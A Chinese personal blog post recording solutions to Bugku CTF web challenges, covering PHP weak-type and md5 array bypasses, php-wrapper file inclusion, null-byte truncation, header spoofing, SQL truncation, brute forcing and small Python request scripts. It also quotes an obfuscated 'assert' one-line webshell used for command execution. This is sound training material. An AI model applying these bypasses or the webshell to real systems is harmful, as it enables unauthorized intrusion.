<!DOCTYPE html>
<html lang="zh-CN">
<head>
  <meta charset="UTF-8">
<meta name="viewport" content="width=device-width, initial-scale=1, maximum-scale=2">
<meta name="theme-color" content="#222">
<meta name="generator" content="Hexo 5.4.0">
  <link rel="apple-touch-icon" sizes="180x180" href="/images/apple-touch-icon-next.png">
  <link rel="icon" type="image/png" sizes="32x32" href="/images/cookie32.ico">
  <link rel="icon" type="image/png" sizes="16x16" href="/images/cookie16.ico">
  <link rel="mask-icon" href="/images/logo.svg" color="#222">

<link rel="stylesheet" href="/css/main.css">


<link rel="stylesheet" href="/lib/font-awesome/css/all.min.css">
  <link rel="stylesheet" href="/lib/pace/pace-theme-minimal.min.css">
  <script src="/lib/pace/pace.min.js"></script>

<script id="hexo-configurations">
    var NexT = window.NexT || {};
    var CONFIG = {"hostname":"chutingting520.github.io","root":"/","scheme":"Gemini","version":"7.8.0","exturl":false,"sidebar":{"position":"left","display":"post","padding":18,"offset":12,"onmobile":false},"copycode":{"enable":true,"show_result":true,"style":null},"back2top":{"enable":true,"sidebar":false,"scrollpercent":true},"bookmark":{"enable":false,"color":"#222","save":"auto"},"fancybox":false,"mediumzoom":false,"lazyload":false,"pangu":false,"comments":{"style":"tabs","active":null,"storage":true,"lazyload":false,"nav":null},"algolia":{"hits":{"per_page":10},"labels":{"input_placeholder":"Search for Posts","hits_empty":"We didn't find any results for the search: ${query}","hits_stats":"${hits} results found in ${time} ms"}},"localsearch":{"enable":true,"trigger":"auto","top_n_per_article":1,"unescape":false,"preload":false},"motion":{"enable":true,"async":false,"transition":{"post_block":"fadeIn","post_header":"slideDownIn","post_body":"slideDownIn","coll_header":"slideLeftIn","sidebar":"slideUpIn"}},"path":"search.xml"};
  </script>

  <meta name="description" content="​         下面是对bugku刷题的记录:">
<meta property="og:type" content="article">
<meta property="og:title" content="bugku">
<meta property="og:url" content="https://chutingting520.github.io/2021/03/22/bugku/index.html">
<meta property="og:site_name" content="WJW&#39;s Blog">
<meta property="og:description" content="​         下面是对bugku刷题的记录:">
<meta property="og:locale" content="zh_CN">
<meta property="og:image" content="https://chutingting520.github.io/2021/03/22/bugku/1.png">
<meta property="og:image" content="https://chutingting520.github.io/2021/03/22/bugku/2.png">
<meta property="og:image" content="https://chutingting520.github.io/2021/03/22/bugku/3.png">
<meta property="og:image" content="https://chutingting520.github.io/2021/03/22/bugku/4.png">
<meta property="og:image" content="https://chutingting520.github.io/2021/03/22/bugku/5.png">
<meta property="og:image" content="https://chutingting520.github.io/2021/03/22/bugku/6.png">
<meta property="og:image" content="https://chutingting520.github.io/2021/03/22/bugku/7.png">
<meta property="og:image" content="https://chutingting520.github.io/2021/03/22/bugku/8.png">
<meta property="og:image" content="https://chutingting520.github.io/2021/03/22/bugku/9.png">
<meta property="og:image" content="https://chutingting520.github.io/2021/03/22/bugku/10.png">
<meta property="og:image" content="https://chutingting520.github.io/2021/03/22/bugku/11.png">
<meta property="og:image" content="https://chutingting520.github.io/2021/03/22/bugku/12.png">
<meta property="og:image" content="https://chutingting520.github.io/2021/03/22/bugku/13.png">
<meta property="og:image" content="https://chutingting520.github.io/2021/03/22/bugku/14.png">
<meta property="og:image" content="https://chutingting520.github.io/2021/03/22/bugku/15.png">
<meta property="og:image" content="https://chutingting520.github.io/2021/03/22/bugku/17.png">
<meta property="og:image" content="https://chutingting520.github.io/2021/03/22/bugku/18.png">
<meta property="og:image" content="https://chutingting520.github.io/2021/03/22/bugku/19.png">
<meta property="og:image" content="https://chutingting520.github.io/2021/03/22/bugku/20.png">
<meta property="og:image" content="https://chutingting520.github.io/2021/03/22/bugku/21.png">
<meta property="og:image" content="https://chutingting520.github.io/2021/03/22/bugku/22.png">
<meta property="og:image" content="https://chutingting520.github.io/2021/03/22/bugku/23.png">
<meta property="og:image" content="https://chutingting520.github.io/2021/03/22/bugku/24.png">
<meta property="og:image" content="https://chutingting520.github.io/2021/03/22/bugku/25.png">
<meta property="og:image" content="https://chutingting520.github.io/2021/03/22/bugku/26.png">
<meta property="og:image" content="https://chutingting520.github.io/2021/03/22/bugku/26.png">
<meta property="og:image" content="https://chutingting520.github.io/2021/03/22/bugku/27.png">
<meta property="og:image" content="https://chutingting520.github.io/2021/03/22/bugku/28.png">
<meta property="og:image" content="https://chutingting520.github.io/2021/03/22/bugku/29.png">
<meta property="og:image" content="https://chutingting520.github.io/2021/03/22/bugku/30.png">
<meta property="og:image" content="https://chutingting520.github.io/2021/03/22/bugku/31.png">
<meta property="article:published_time" content="2021-03-22T04:27:43.000Z">
<meta property="article:modified_time" content="2021-07-27T01:47:48.793Z">
<meta property="article:author" content="WJW">
<meta property="article:tag" content="CTF">
<meta name="twitter:card" content="summary">
<meta name="twitter:image" content="https://chutingting520.github.io/2021/03/22/bugku/1.png">

<link rel="canonical" href="https://chutingting520.github.io/2021/03/22/bugku/">


<script id="page-configurations">
  // https://hexo.io/docs/variables.html
  CONFIG.page = {
    sidebar: "",
    isHome : false,
    isPost : true,
    lang   : 'zh-CN'
  };
</script>

  <title>bugku | WJW's Blog</title>
  






  <noscript>
  <style>
  .use-motion .brand,
  .use-motion .menu-item,
  .sidebar-inner,
  .use-motion .post-block,
  .use-motion .pagination,
  .use-motion .comments,
  .use-motion .post-header,
  .use-motion .post-body,
  .use-motion .collection-header { opacity: initial; }

  .use-motion .site-title,
  .use-motion .site-subtitle {
    opacity: initial;
    top: initial;
  }

  .use-motion .logo-line-before i { left: initial; }
  .use-motion .logo-line-after i { right: initial; }
  </style>
</noscript>

<link rel="alternate" href="/atom.xml" title="WJW's Blog" type="application/atom+xml">
</head>

<body itemscope itemtype="http://schema.org/WebPage">
  <div class="container use-motion">
    <div class="headband"></div>

    <header class="header" itemscope itemtype="http://schema.org/WPHeader">
      <div class="header-inner"><div class="site-brand-container">
  <div class="site-nav-toggle">
    <div class="toggle" aria-label="切换导航栏">
      <span class="toggle-line toggle-line-first"></span>
      <span class="toggle-line toggle-line-middle"></span>
      <span class="toggle-line toggle-line-last"></span>
    </div>
  </div>

  <div class="site-meta">

    <a href="/" class="brand" rel="start">
      <span class="logo-line-before"><i></i></span>
      <h1 class="site-title">WJW's Blog</h1>
      <span class="logo-line-after"><i></i></span>
    </a>
  </div>

  <div class="site-nav-right">
    <div class="toggle popup-trigger">
        <i class="fa fa-search fa-fw fa-lg"></i>
    </div>
  </div>
</div>




<nav class="site-nav">
  <ul id="menu" class="main-menu menu">
        <li class="menu-item menu-item-home">

    <a href="/" rel="section"><i class="fa fa-home fa-fw"></i>首页</a>

  </li>
        <li class="menu-item menu-item-tags">

    <a href="/tags/" rel="section"><i class="fa fa-tags fa-fw"></i>标签<span class="badge">14</span></a>

  </li>
        <li class="menu-item menu-item-categories">

    <a href="/categories/" rel="section"><i class="fa fa-th fa-fw"></i>分类<span class="badge">0</span></a>

  </li>
        <li class="menu-item menu-item-archives">

    <a href="/archives/" rel="section"><i class="fa fa-archive fa-fw"></i>归档<span class="badge">61</span></a>

  </li>
      <li class="menu-item menu-item-search">
        <a role="button" class="popup-trigger"><i class="fa fa-search fa-fw"></i>搜索
        </a>
      </li>
  </ul>
</nav>



  <div class="search-pop-overlay">
    <div class="popup search-popup">
        <div class="search-header">
  <span class="search-icon">
    <i class="fa fa-search"></i>
  </span>
  <div class="search-input-container">
    <input autocomplete="off" autocapitalize="off"
           placeholder="搜索..." spellcheck="false"
           type="search" class="search-input">
  </div>
  <span class="popup-btn-close">
    <i class="fa fa-times-circle"></i>
  </span>
</div>
<div id="search-result">
  <div id="no-result">
    <i class="fa fa-spinner fa-pulse fa-5x fa-fw"></i>
  </div>
</div>

    </div>
  </div>

</div>
    </header>

    
  <div class="back-to-top">
    <i class="fa fa-arrow-up"></i>
    <span>0%</span>
  </div>


    <main class="main">
      <div class="main-inner">
        <div class="content-wrap">
          

          <div class="content post posts-expand">
            

    
  
  
  <article itemscope itemtype="http://schema.org/Article" class="post-block" lang="zh-CN">
    <link itemprop="mainEntityOfPage" href="https://chutingting520.github.io/2021/03/22/bugku/">

    <span hidden itemprop="author" itemscope itemtype="http://schema.org/Person">
      <meta itemprop="image" content="/images/cat.jpg">
      <meta itemprop="name" content="WJW">
      <meta itemprop="description" content="">
    </span>

    <span hidden itemprop="publisher" itemscope itemtype="http://schema.org/Organization">
      <meta itemprop="name" content="WJW's Blog">
    </span>
      <header class="post-header">
        <h1 class="post-title" itemprop="name headline">
          bugku
        </h1>

        <div class="post-meta">
            <span class="post-meta-item">
              <span class="post-meta-item-icon">
                <i class="far fa-calendar"></i>
              </span>
              <span class="post-meta-item-text">发表于</span>

              <time title="创建时间：2021-03-22 12:27:43" itemprop="dateCreated datePublished" datetime="2021-03-22T12:27:43+08:00">2021-03-22</time>
            </span>
              <span class="post-meta-item">
                <span class="post-meta-item-icon">
                  <i class="far fa-calendar-check"></i>
                </span>
                <span class="post-meta-item-text">更新于</span>
                <time title="修改时间：2021-07-27 09:47:48" itemprop="dateModified" datetime="2021-07-27T09:47:48+08:00">2021-07-27</time>
              </span>

          
            <span class="post-meta-item" title="阅读次数" id="busuanzi_container_page_pv" style="display: none;">
              <span class="post-meta-item-icon">
                <i class="fa fa-eye"></i>
              </span>
              <span class="post-meta-item-text">阅读次数：</span>
              <span id="busuanzi_value_page_pv"></span>
            </span><br>
            <span class="post-meta-item" title="本文字数">
              <span class="post-meta-item-icon">
                <i class="far fa-file-word"></i>
              </span>
                <span class="post-meta-item-text">本文字数：</span>
              <span>15k</span>
            </span>
            <span class="post-meta-item" title="阅读时长">
              <span class="post-meta-item-icon">
                <i class="far fa-clock"></i>
              </span>
                <span class="post-meta-item-text">阅读时长 &asymp;</span>
              <span>14 分钟</span>
            </span>

        </div>
      </header>

    
    
    
    <div class="post-body" itemprop="articleBody">

      
        <p>​         下面是对bugku刷题的记录:</p>
<span id="more"></span>

<h3 id="web1"><a href="#web1" class="headerlink" title="web1"></a>web1</h3><p>刚开始图片花里胡哨的，f12查看源码，有flag。</p>
<h3 id="web2"><a href="#web2" class="headerlink" title="web2"></a>web2</h3><p>想直接修改源码为1+1，再输入2验证，发现密码有误。</p>
<p>再找找js代码，结果发现flag就在里面哈哈哈；</p>
<p>还可以修改长度限制，maxlength。</p>
<h3 id="web3"><a href="#web3" class="headerlink" title="web3"></a>web3</h3><p>很简单的一个get提交。</p>
<h3 id="web4"><a href="#web4" class="headerlink" title="web4"></a>web4</h3><p>很简单的一个post提交。</p>
<h3 id="web5"><a href="#web5" class="headerlink" title="web5"></a>web5</h3><p>php弱类型比较，1再加一个字母即可。</p>
<h3 id="web6"><a href="#web6" class="headerlink" title="web6"></a>web6</h3><p>火狐浏览器直接停止弹窗，查看源码，后面有一串编码，对编码了解比较少，就上网搜了一个解码器，一试结果就出来了，是unicode编码。</p>
<p>如果是别的浏览器，禁用js就能阻止弹窗。</p>
<h3 id="web7"><a href="#web7" class="headerlink" title="web7"></a>web7</h3><p>使用burp，到repeater，多go几次，flag就出来了。</p>
<h3 id="web8"><a href="#web8" class="headerlink" title="web8"></a>web8</h3><p>文件包含flag.php,使用get传入参数，直接使用代码中的函数show_source查看flag.php文件。</p>
<h3 id="web9"><a href="#web9" class="headerlink" title="web9"></a>web9</h3><p>这里有个正则过滤参数，过滤了非字母、数字、下划线的代码。</p>
<p>想用”web8“方式解题，行不通，再读读题，flag隐藏在变量中，百度查到一个引用全局作用域中可用的全部变量——GLOBALS(记得大写，有区分。)</p>
<p>直接传入GLOBALS</p>
<h3 id="web10"><a href="#web10" class="headerlink" title="web10"></a>web10</h3><p>本来还想扫一下目录的，结果用burp查看到了repeater结果flag就在消息头。</p>
<p>其实直接f12就能查看到了在消息头中。</p>
<h3 id="web11"><a href="#web11" class="headerlink" title="web11"></a>web11</h3><p>直接扫描目录，扫到一个shell.php,访问有个登陆页面，使用burp进行密码爆破，密码为hack。</p>
<h3 id="web12"><a href="#web12" class="headerlink" title="web12"></a>web12</h3><p>知道用户名为admin，想直接使用密码爆破，但是封IP，再查看源码发现有一段base64加密的代码，解密得到的应该是登陆密码test123。还要解封IP，想到使用X-Forwarded-For伪造真实IP为127.0.0.1，使用burp添加上即可获得flag。</p>
<h3 id="web13"><a href="#web13" class="headerlink" title="web13"></a>web13</h3><p>查看源码，发现url编码，到专门的解码器去解码获得，</p>
<p><img src="/2021/03/22/bugku/1.png"></p>
<p>再根据代码拼接flag内容。</p>
<h3 id="web14"><a href="#web14" class="headerlink" title="web14"></a>web14</h3><p>点击后出现index.php,猜测flag在index.php,</p>
<p>直接修改show.php为index.php来读取，读取失败，</p>
<p>再仔细看看url中有个file，我们可尝试使用文件包含，php伪协议，来读取文件index.php。</p>
<p><img src="/2021/03/22/bugku/2.png"></p>
<p>再解base64编码得出flag，源码中的确存在文件包含。(php伪协议在前面的文章有详细介绍)</p>
<h3 id="web15"><a href="#web15" class="headerlink" title="web15"></a>web15</h3><p>这里提示很明显，直接使用burp爆破密码，就是量有点大，时间比较久，还有设置数字爆破时，</p>
<p>需要一个小操作，这个时候payload的数字只有一个</p>
<p><img src="/2021/03/22/bugku/3.png"></p>
<p><img src="/2021/03/22/bugku/4.png"></p>
<p>需要切换到Hex，再切换回去，payload的数字才会更新。(这是burp的一个小bug)。</p>
<p>爆破出来密码是12468。</p>
<p>登陆就有flag，这里也可以使用python脚本爆破，速度更快。</p>
<h3 id="web16"><a href="#web16" class="headerlink" title="web16"></a>web16</h3><p>备份是个好习惯，一看见备份，直接扫描目录，发现index.php.bak，打开文件，查看源码。</p>
<p><img src="/2021/03/22/bugku/5.png"></p>
<p>百度了一下，<strong>md5无法加密数组</strong>，我们就可以使用数组，使得加密的值都为null值相等。</p>
<p><img src="/2021/03/22/bugku/6.png"></p>
<p>居然不行，再仔细看看源码，发现key被替换了，双写绕过即可</p>
<p><img src="/2021/03/22/bugku/7.png"></p>
<h3 id="web17"><a href="#web17" class="headerlink" title="web17"></a>web17</h3><p>一看就知道是sql注入了，直接sqlmap爆破一手。</p>
<p>一爆破就出来了，这里不再赘述。</p>
<h3 id="web18"><a href="#web18" class="headerlink" title="web18"></a>web18</h3><p>—秋名山车神</p>
<p>要在2s内计算出结果，多刷新几次，发现要post提交数值，这里需使用python脚本了。</p>
<figure class="highlight plaintext"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br><span class="line">12</span><br><span class="line">13</span><br><span class="line">14</span><br></pre></td><td class="code"><pre><span class="line">#!/usr/bin/python3</span><br><span class="line"></span><br><span class="line">import requests#请求模块</span><br><span class="line">import re#正则表达式模块</span><br><span class="line">url=&#x27;http://114.67.246.176:17346/&#x27;</span><br><span class="line">r=requests.session()#创建session值，否则提交结果的时候，重新生成了一个新的表达式。</span><br><span class="line">text=r.get(url).text#将get获得的数据以文本形式显示，为后面做正则匹配。</span><br><span class="line">bds=re.findall(&#x27;&lt;div&gt;(.*?)&lt;/div&gt;&#x27;,text)#通过re模块的函数findall获取表达式</span><br><span class="line">bds=&quot;&quot;.join(bds)#使用join方法把列表转为字符串，由于eval函数接收的类型。</span><br><span class="line">bds=bds[:-3]#去除最后的=?;获得一串数字计算。</span><br><span class="line">post=eval(bds)#计算表达式的值</span><br><span class="line">data=&#123;&#x27;value&#x27;:post&#125;#构造post的data部分</span><br><span class="line">flag=r.post(url,data=data)</span><br><span class="line">print(flag.text)</span><br></pre></td></tr></table></figure>



<p>这里记得先安装一下python requests库(不自带) 到script 输入cmd 使用命令<code>pip install requests</code>即可。</p>
<p>安装失败，说pip需要更新，复制下来即可，再次安装requests库。</p>
<p>如果无返回结果，多尝试几次即可。</p>
<h3 id="web19"><a href="#web19" class="headerlink" title="web19"></a>web19</h3><p>使用burp查看消息头，有加密的flag，base64解密，得到</p>
<p><img src="/2021/03/22/bugku/8.png"></p>
<p>被坑了，flag错误，再看看页面源码，有注释</p>
<p><img src="/2021/03/22/bugku/9.png"></p>
<p>要提交你发现的<strong>宽度</strong>，但是我们得到的不是数字，发现可以<strong>再一次base64解密</strong>，得到114989，在这里发现英语翻译的重要性，翻译错了方向容易错误。看样子就是跟上一题类似，要快就写脚本了，这个相比秋名山车神的简单，没有正则匹配。</p>
<figure class="highlight plaintext"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br><span class="line">12</span><br></pre></td><td class="code"><pre><span class="line">#!/usr/bin/python3</span><br><span class="line">import requests</span><br><span class="line">import base64</span><br><span class="line">url = &#x27;http://114.67.246.176:14900/&#x27;</span><br><span class="line">r= requests.session()     # 获取session对话</span><br><span class="line">retun = r.get(url).headers   #已经查到 flag在header里面</span><br><span class="line">s=retun[&#x27;flag&#x27;]#获取flag里面base64值</span><br><span class="line">a=base64.b64decode(s).decode().split(&#x27; &#x27;)[1] # 第一个base64解码后面得到base64值把前面的字符过滤掉，以空格符分成两段，再获得我们想要的base64值。</span><br><span class="line">b=base64.b64decode(a).decode() #第二次base64解码</span><br><span class="line">data=&#123;&#x27;margin&#x27;:b&#125;</span><br><span class="line">print(r.post(url,data=data).text) #传值 post margin，并把返回数据以文本形式打印。</span><br><span class="line"></span><br></pre></td></tr></table></figure>

<p>参考链接：<a target="_blank" rel="noopener" href="https://blog.csdn.net/qq_46540840/article/details/113877495?ops_request_misc=%257B%2522request%255Fid%2522%253A%2522161676566116780274126883%2522%252C%2522scm%2522%253A%252220140713.130102334..%2522%257D&amp;request_id=161676566116780274126883&amp;biz_id=0&amp;utm_medium=distribute.pc_search_result.none-task-blog-2~all~sobaiduend~default-1-113877495.pc_search_result_no_baidu_js&amp;utm_term=bugku+web19">https://blog.csdn.net/qq_46540840/article/details/113877495?ops_request_misc=%257B%2522request%255Fid%2522%253A%2522161676566116780274126883%2522%252C%2522scm%2522%253A%252220140713.130102334..%2522%257D&amp;request_id=161676566116780274126883&amp;biz_id=0&amp;utm_medium=distribute.pc_search_result.none-task-blog-2~all~sobaiduend~default-1-113877495.pc_search_result_no_baidu_js&amp;utm_term=bugku+web19</a></p>
<h3 id="web20"><a href="#web20" class="headerlink" title="web20"></a>web20</h3><p>观察一下url，filename后面接的是base64加密的，我们解密一下是keys.txt。</p>
<p>这里还有一个?line=，试着在后面接数字，什么都没返回，我们再试着编码一下index.php，访问直接404。</p>
<p>可能filename后面接的是index.php，我们不妨试一下，没出错了，再改一下line的值，返回了源码了，我们使用python脚本把每一句读出来，不会写脚本可以一个个试一下。哈哈哈哈哈</p>
<figure class="highlight plaintext"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br></pre></td><td class="code"><pre><span class="line">#!/usr/bin/python3</span><br><span class="line">import requests</span><br><span class="line">for i in range(25):#设置一个25就差不多了，可以更大</span><br><span class="line">	url=&quot;http://114.67.246.176:18675/?line=&quot;+str(i)+&quot;&amp;filename=aW5kZXgucGhw&quot;#这里注意数字25要当作字符串处理。</span><br><span class="line">	s=requests.get(url)</span><br><span class="line">	print (s.text) ##</span><br></pre></td></tr></table></figure>

<p>整理得到：<img src="/2021/03/22/bugku/10.png"></p>
<p>代码审计一下，error_reporting(0)报错结果，直接性的源码泄露，传参给file文件经base64解码，所以要对index.php进行base64编码，</p>
<p>这里还有一个cookie值判断，flag应该就在keys.php，我们在把index.php修改成keys.php即可。</p>
<p><img src="/2021/03/22/bugku/11.png"></p>
<h3 id="web21"><a href="#web21" class="headerlink" title="web21"></a>web21</h3><p>f12发现源码中有个1p.html,试着访问一下，直接跳转到bugku首页，看了网上的师傅，要通过<strong>view-source</strong>获得源码</p>
<p><img src="/2021/03/22/bugku/12.png"></p>
<p>发现参数被url编码，我们进行url解码。</p>
<p><img src="/2021/03/22/bugku/13.png"></p>
<p>还有base64加密，我们进行解密。又是一串url编码</p>
<p><img src="/2021/03/22/bugku/14.png"></p>
<p>我们对其解码，终于源码出来了。</p>
<p><img src="/2021/03/22/bugku/15.png"></p>
<p>代码审计一下，函数stripos检测变量a中是否出现.，出现则返回，file_get_contents函数将变量a读入data，函数eregi — 不区分大小写的正则表达式匹配，匹配成功返回true，匹配不成功返回false。</p>
<p>本题有三个难点，要从函数的限制和漏洞出发，还有php弱类型比较。</p>
<p>对于id参数的限制，要使得id值存在，且弱类型比较要为0，这里可以回看一下php弱类型比较，直接让id得参数值为a。</p>
<p>对于源码中data的值是通过file_get_contents读取变量a，所以a的值必须为数据流， 这里使用php伪协议来访问输入输出的数据流。</p>
<p>这里的意思是匹配111x的字符要是1114，x要为4，x是变量b中第一个字符，后面又有一句b的第一个字符不能为4，难点就在这里了。</p>
<p>函数eregi肯定存在漏洞，百度了一下，<strong>ereg()函数或eregi()函数存在空字符截断漏洞，即参数中的正则表达式或待匹配字符串遇到空字符则截断丢弃后面的数据</strong></p>
<p><em><strong>\x00即0x00，是一个十六进制转义符，用来表示空字符，这里需要url编码为%00</strong></em>，在前面upload靶场有%00截断的详细解释。</p>
<h3 id="web22"><a href="#web22" class="headerlink" title="web22"></a>web22</h3><p>题目描述： 送给大家一个过狗一句话 $poc=”a#s#s#e#r#t”; $poc_1=explode(“#”,$poc); $poc_2=$poc_1[0].$poc_1[1].$poc_1[2].$poc_1[3].$poc_1[4].$poc_1[5]; $poc_2($_GET[‘s’])</p>
<p>这句话的意思是，把poc里变量中assert(没有#)打散成数组赋值给poc_1，再把数组拼接赋值给poc_2,</p>
<p>最后就变成assert()函数获得get提交的变量s。(这里一些一句话木马绕过的技巧在前面文章web还有其他的。)</p>
<p>我们直接通过s变量提交命令执行，</p>
<p><img src="/2021/03/22/bugku/17.png"></p>
<p>查看文件，发现txt文件，直接访问得到flag。</p>
<p><img src="/2021/03/22/bugku/18.png"></p>
<h3 id="web23"><a href="#web23" class="headerlink" title="web23"></a>web23</h3><p>审计源码，又是正则表达式，这个匹配条件的确有点长，慢慢分析，就是简单的正则表达式匹配。</p>
<figure class="highlight php"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br></pre></td><td class="code"><pre><span class="line"> <span class="meta">&lt;?php</span> </span><br><span class="line">highlight_file(<span class="string">&#x27;2.php&#x27;</span>);</span><br><span class="line"><span class="variable">$key</span>=<span class="string">&#x27;flag&#123;********************************&#125;&#x27;</span>;</span><br><span class="line"><span class="variable">$IM</span>= preg_match(<span class="string">&quot;/key.*key.&#123;4,7&#125;key:\/.\/(.*key)[a-z][[:punct:]]/i&quot;</span>, trim(<span class="variable">$_GET</span>[<span class="string">&quot;id&quot;</span>]), <span class="variable">$match</span>);</span><br><span class="line"><span class="keyword">if</span>( <span class="variable">$IM</span> )&#123; </span><br><span class="line">  <span class="keyword">die</span>(<span class="string">&#x27;key is: &#x27;</span>.<span class="variable">$key</span>);</span><br><span class="line">&#125;</span><br><span class="line"><span class="meta">?&gt;</span> </span><br></pre></td></tr></table></figure>

<p>/key表示匹配key，key和key之间的.*表示贪婪模式，key和key之间的都会匹配，.表示匹配除换行符之外的任何单字符，{4,7}表示至少4次至多7次中括号前面的字符，[a-z]表示a到z的任意字符，[[:punct:]] ：匹配任何标点符号；很多种构造方法。</p>
<p><img src="/2021/03/22/bugku/19.png"></p>
<p>对于正则表达式的学习可以参考<a target="_blank" rel="noopener" href="https://www.runoob.com/regexp/regexp-tutorial.html">https://www.runoob.com/regexp/regexp-tutorial.html</a></p>
<h3 id="web24"><a href="#web24" class="headerlink" title="web24"></a>web24</h3><p>一进去就很多话，先看看源码，发现一个code.txt，</p>
<figure class="highlight php"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br><span class="line">12</span><br></pre></td><td class="code"><pre><span class="line"><span class="meta">&lt;?php</span></span><br><span class="line"><span class="keyword">if</span>(<span class="keyword">isset</span>(<span class="variable">$_GET</span>[<span class="string">&#x27;v1&#x27;</span>]) &amp;&amp; <span class="keyword">isset</span>(<span class="variable">$_GET</span>[<span class="string">&#x27;v2&#x27;</span>]) &amp;&amp; <span class="keyword">isset</span>(<span class="variable">$_GET</span>[<span class="string">&#x27;v3&#x27;</span>]))&#123;</span><br><span class="line">    <span class="variable">$v1</span> = <span class="variable">$_GET</span>[<span class="string">&#x27;v1&#x27;</span>];</span><br><span class="line">    <span class="variable">$v2</span> = <span class="variable">$_GET</span>[<span class="string">&#x27;v2&#x27;</span>];</span><br><span class="line">    <span class="variable">$v3</span> = <span class="variable">$_GET</span>[<span class="string">&#x27;v3&#x27;</span>];</span><br><span class="line">    <span class="keyword">if</span>(<span class="variable">$v1</span> != <span class="variable">$v2</span> &amp;&amp; md5(<span class="variable">$v1</span>) == md5(<span class="variable">$v2</span>))&#123;</span><br><span class="line">        <span class="keyword">if</span>(!strcmp(<span class="variable">$v3</span>, <span class="variable">$flag</span>))&#123;</span><br><span class="line">            <span class="keyword">echo</span> <span class="variable">$flag</span>;</span><br><span class="line">        &#125;</span><br><span class="line">    &#125;</span><br><span class="line">&#125;</span><br><span class="line"><span class="meta">?&gt;</span></span><br></pre></td></tr></table></figure>

<p>第一个if条件我们通过前面学习的md5无法对数组加密进行绕过，第二个条件，</p>
<p>查看函数strcmp，作用是比较两个函数，strcmp(string1,string2)</p>
<p>如果string1等于string2，则返回=0，这里要使得函数返回值为0，还会echo出flag，同样使用了数组绕过函数比较，数组和字符串比较报错，返回0。</p>
<p><img src="/2021/03/22/bugku/20.png"></p>
<h3 id="web25"><a href="#web25" class="headerlink" title="web25"></a>web25</h3><p>先注册了一个账户，登陆，结果说不是管理员还想查看flag。做完了sql靶场，还是第一次听到约束注入，直接百度一下。</p>
<p>这篇文章不错<a target="_blank" rel="noopener" href="https://www.jianshu.com/p/f564ef699b69">https://www.jianshu.com/p/f564ef699b69</a></p>
<p>原理就是：</p>
<p><strong>在insert中，sql会根据varchar来限制字符串的最大长度。</strong><br><strong>1、如果字符串的长度大于n个字符的话，那么仅使用字符串的前n个字符.</strong><br><strong>2、在sql中执行字符串处理时，字符串末尾的空格符将会被删除。</strong></p>
<p>这里我们添加空格即可。</p>
<p>操作很简单，创建一个账户admin               后面加多点空格，再登陆即可获得flag。</p>
<h3 id="web26"><a href="#web26" class="headerlink" title="web26"></a>web26</h3><p>提示是否来着google。</p>
<p><img src="/2021/03/22/bugku/21.png"></p>
<p>添加一下referer值即可。</p>
<h3 id="web27"><a href="#web27" class="headerlink" title="web27"></a>web27</h3><p>题目描述：md5 collision(md5碰撞)</p>
<p>通过变量a随便提交一个数返回错误，看看有没有其他提示，也没发现，百度一下结果发现缺失源码。</p>
<figure class="highlight php"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br><span class="line">12</span><br><span class="line">13</span><br></pre></td><td class="code"><pre><span class="line"><span class="variable">$md51</span> = md5(<span class="string">&#x27;QNKCDZO&#x27;</span>);</span><br><span class="line"><span class="variable">$a</span> = @<span class="variable">$_GET</span>[<span class="string">&#x27;a&#x27;</span>];</span><br><span class="line"><span class="variable">$md52</span> = @md5(<span class="variable">$a</span>);</span><br><span class="line"><span class="keyword">if</span>(<span class="keyword">isset</span>(<span class="variable">$a</span>))&#123;</span><br><span class="line">    <span class="keyword">if</span> (<span class="variable">$a</span> != <span class="string">&#x27;QNKCDZO&#x27;</span> &amp;&amp; <span class="variable">$md51</span> == <span class="variable">$md52</span>) &#123;</span><br><span class="line">        <span class="keyword">echo</span> <span class="string">&quot;nctf&#123;*****************&#125;&quot;</span>;</span><br><span class="line">    &#125; <span class="keyword">else</span> &#123;</span><br><span class="line">        <span class="keyword">echo</span> <span class="string">&quot;false!!!&quot;</span>;</span><br><span class="line">    &#125;</span><br><span class="line">&#125;</span><br><span class="line"><span class="keyword">else</span>&#123;</span><br><span class="line">    <span class="keyword">echo</span> <span class="string">&quot;please input a&quot;</span>;</span><br><span class="line">&#125;</span><br></pre></td></tr></table></figure>

<p>看一下源码，这里又涉及md5加密，还有弱类型比较，但这个只能穿a一个值，加密md51和md52是弱类型比较，两个不用完全相等，</p>
<p>先看看’QNKCDZO’加密后的md5值，为0E830400451993494058024219903391，这里再进行弱类型比较时，0e开头，会被转换为科学计数法，我们只要找到转化后0E开头的值即可，这里有篇文章总结的不错：<a target="_blank" rel="noopener" href="https://blog.csdn.net/bestlzk/article/details/77994272">https://blog.csdn.net/bestlzk/article/details/77994272</a></p>
<h3 id="web28"><a href="#web28" class="headerlink" title="web28"></a>web28</h3><p>这题比xff_referer的还简单，在消息报头间加上<strong>X-Forwarded-For</strong>:127.0.0.1即可。</p>
<h3 id="web29"><a href="#web29" class="headerlink" title="web29"></a>web29</h3><p>—各种绕过</p>
<p>源码</p>
